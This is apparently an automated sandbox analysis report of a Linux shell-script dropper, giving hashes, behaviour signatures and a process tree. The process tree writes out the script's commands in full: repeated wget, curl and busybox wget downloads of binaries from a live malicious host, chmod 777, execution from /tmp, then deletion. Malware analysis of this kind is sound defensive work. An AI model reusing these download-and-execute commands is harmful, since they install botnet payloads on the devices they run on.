Analysis
-
max time kernel
138s -
max time network
137s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
-
Size
10KB
-
MD5
f6e271e4d94f1fe16e461104ef8f736a
-
SHA1
dc7560e563611fd68f908f9baad26d7487947976
-
SHA256
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da
-
SHA512
4435d20a9257c676d12aecdcca5eee355e04974d3429277c941b97658f8cefb32bc6b77fa47934d12ff9dc7d5457e3ab6a4ae80e4b7fa206d9ac58a61c02b084
-
SSDEEP
192:so4QVCOCkSMFkqcTZx45O4QVCOoZx4MF1:sFkJFkqcTZx4RZx4MF1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 895 chmod 923 chmod 951 chmod 846 chmod 874 chmod 937 chmod 1000 chmod 867 chmod 916 chmod 972 chmod 853 chmod 888 chmod 979 chmod 993 chmod 764 chmod 881 chmod 909 chmod 965 chmod 1007 chmod 1014 chmod 839 chmod 902 chmod 986 chmod 747 chmod 860 chmod 958 chmod 930 chmod 944 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N 748 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 765 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU 840 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O 847 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ 854 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 861 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP 868 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U 875 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx 882 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ 889 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP 896 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf 903 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU 910 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe 917 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx 924 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 931 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP 938 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U 945 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe 952 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ 959 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP 966 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf 973 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU 980 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU 987 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N 994 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 1001 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ 1008 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O 1015 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 870 wget 934 curl 941 curl 943 busybox 997 curl 1013 busybox 746 busybox 852 busybox 859 busybox 877 wget 915 busybox 922 busybox 954 wget 983 curl 850 curl 856 wget 992 busybox 1010 wget 866 busybox 884 wget 906 curl 955 curl 728 wget 849 wget 898 wget 962 curl 964 busybox 968 wget 969 curl 1003 wget 871 curl 887 busybox 1011 curl 929 busybox 1006 busybox 741 curl 878 curl 899 curl 971 busybox 778 curl 843 curl 892 curl 905 wget 908 busybox 936 busybox 770 wget 857 curl 989 wget 873 busybox 926 wget 864 curl 901 busybox 919 wget 947 wget 961 wget 757 busybox 792 busybox 940 wget 978 busybox 982 wget 845 busybox 927 curl 885 curl 912 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ curl File opened for modification /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf curl File opened for modification /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ curl File opened for modification /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx curl File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N curl File opened for modification /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O curl File opened for modification /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP curl File opened for modification /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ curl File opened for modification /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP curl File opened for modification /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx curl File opened for modification /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP curl File opened for modification /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U curl File opened for modification /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U curl File opened for modification /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe curl File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 curl File opened for modification /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ curl File opened for modification /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O curl File opened for modification /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 curl File opened for modification /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP curl File opened for modification /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe curl File opened for modification /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 curl File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU curl File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N curl File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU curl File opened for modification /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU curl File opened for modification /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU curl File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 curl File opened for modification /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf curl
Processes
-
/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh1⤵PID:717
-
/bin/rm/bin/rm bins.sh2⤵PID:721
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:749
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:792
-
-
/bin/chmodchmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:841
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- System Network Configuration Discovery
PID:845
-
-
/bin/chmodchmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:848
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:849
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:880
-
-
/bin/chmodchmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:894
-
-
/bin/chmodchmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
